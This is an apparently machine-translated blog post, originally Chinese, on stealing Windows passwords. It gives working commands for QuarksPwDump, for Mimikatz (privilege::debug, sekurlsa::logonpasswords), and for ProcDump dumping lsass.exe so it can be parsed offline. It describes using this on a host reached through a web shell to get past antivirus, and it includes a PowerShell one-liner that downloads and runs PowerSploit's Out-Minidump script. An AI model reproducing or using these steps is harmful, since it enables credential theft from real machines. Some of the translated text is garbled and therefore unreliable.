About Windows family password fetching

First of all, you should review the Windows System password hash of some knowledge: (below this section from the network)

First introduce the Windows password hash:

The early SMB protocol transmits plaintext passwords over the network. Later, the "LAN Manager challenge/response" authentication mechanism, called LM, is so simple that it can be easily cracked. Microsoft has proposed a WindowsNT challenge/response verification mechanism, called NTLM. There is now an updated NTLMV2 and Kerberos authentication system. Windows encrypted passwords password, we call it hash (Chinese: hash), Windows system password hash By default generally consists of two parts: the first part is Lm-hash, the second part is Ntlm-hash.

Ntlm-hash and Lm-hash algorithm, clear text password case sensitive, but not according to Ntlm-hash determine whether the original plaintext password is less than 8 bytes, get rid of the magic string "[email protected]#$%". MD4 is a true one-way hash function, which is more difficult for the data source to appear in clear text. The problem is that Microsoft insists that Ntlm-hash's strength is high, but to avoid the fact that, in order to maintain backward compatibility, ntlm-hash default is always used with Lm-hash. This means that Ntlm-hash's emphasis on higher is not safe, but potentially damaging to security. After adding Ntlm-hash, first use Lm-hash's weaknesses to cite the original plaintext password of the case-insensitive version, and then use Ntlm-hash to correct the original plaintext password case-sensitive version.

The hash password format under Windows system is: User name: Rid:lm-hash value: Nt-hash value, for example:

ADMINISTRATOR:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC::: Indicates

User name is: Administrator

RID is: 500

The Lm-hash value is: C8825db10f2590eaaad3b435b51404ee

The Nt-hash value is: 683020925c5d8569c23aa724774ce6cc

If you know the user's hash password, take the c8825db10f2590eaaad3b435b51404ee:683020925c5d8569c23aa724774ce6cc to hash online search site.

Generally I use QUARKSPWDUMP_V0.2B to crawl the entire Windows family of password hash, in Windows Server 2003 that is a catch a quasi, get the hash value in http://www.objectif-securite.ch /en/ophcrack.php is just a second break. So, the problem is that my password crawled under Windows Server 2008 and Windows server2012 is a bit strange, as the software introduction of Windows server2008 and Windows server2012 is all that can be crawled. Well, I'm still going to explain this with a virtual machine system. Now that the virtual machine is open windows server2012, let's use it to demonstrate it.

Quarkspwdump the command to crawl the password is as follows: (other commands can refer to the software description)

Quarkspwdump.exe-dhl

In conjunction with the diagram, let's look at:

Seems to have crawled the system's hash, according to the previous face Windows hash Knowledge Introduction:

The value of Lm-hash is Aad3b435b51404eeaad3b435b51404ee

The value of Nt-hash is ce770e312d64ae0933d455b994e9c97d

Well, I get the entire hash value to take the online hack, the result is as follows:

It can't be cracked, it's not right. Isn't that embarrassing?

We take out another password grab artifact Mimikatz to try it out and compare it with the results above. The command is as follows:

First enter the command:

Privilege::d Ebug

Then enter the command:

Sekurlsa::logonpasswords

The results of the diagram are as follows:

have found, Mimikatz and Quarkspwdump crawl Lm-hash is different, and Mimikatz directly to the system password to take. Nt-hash two software gets the same result.

Well, say a little bit. The idea of penetration testing, I also know yesterday, penetration testing is really a long process of accumulation of experience. First of all, the scene, I have chopper connected to the other host, but the system installed by default 360 antivirus software and 360 security guard. I uploaded the Mimikatz and quarkspwdump have been avira. That is to say, I want to use these two software conventional ideas to get the system's password hash is not likely. In fact, we can first dump the other host's lsass memory files, and then in their own host with Mimikatz processing, so that the other host system hash and password. or the virtual machine's Windows server2012 also demonstrates.

Can go to Microsoft's official website download Prodump, the latest version is v7.01, this certainly will not cause anti-virus software to report poison and Avira.

The command is as follows:

Procdump.exe-accepteula-ma Lsass.exe Lsass.dmp

This is illustrated below:

Next, we will demonstrate the local use of Mimikatz to crack:

First enter the command:

Mimikatz.exe "Sekurlsa::minidump lsass.dmp"

Then enter the command:

Sekurlsa::logonpasswords

The results are illustrated below:

Can see, can get offline to get the system password, so you can bypass antivirus software on the other side of the killing.

In the cloud knowledge base, there are also commands to see the same work done with PowerShell in Prodump. The specific commands are as follows:

PowerShell IEX (New-object net.webclient). Downloadstring (' Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 '); "Get-process Lsass | Out-minidump "

Under Windows server2012 under the virtual machine, the result fails and you don't know what the Ghost is:

Keep trying and succeed again. Embarrassed,:

In the virtual machine in Windows server2008, try to get as shown:

To be cracked, get as shown:

I tried it on the infiltrated host and found it to be possible, but the chopper virtual terminal will show an error, and the PowerShell code has actually been executed successfully. But the overall feeling is still more convenient to use Prodump.

Yes, there are also integrated Mimkatz in the Metasploit. Specific tutorials can refer to Http://www.offensive-security.com/metasploit-unleashed/Mimikatz

Okay, here it is. Just leave a note for the Infiltration Exchange study, please do not use in illegal channels .

About Windows family password fetching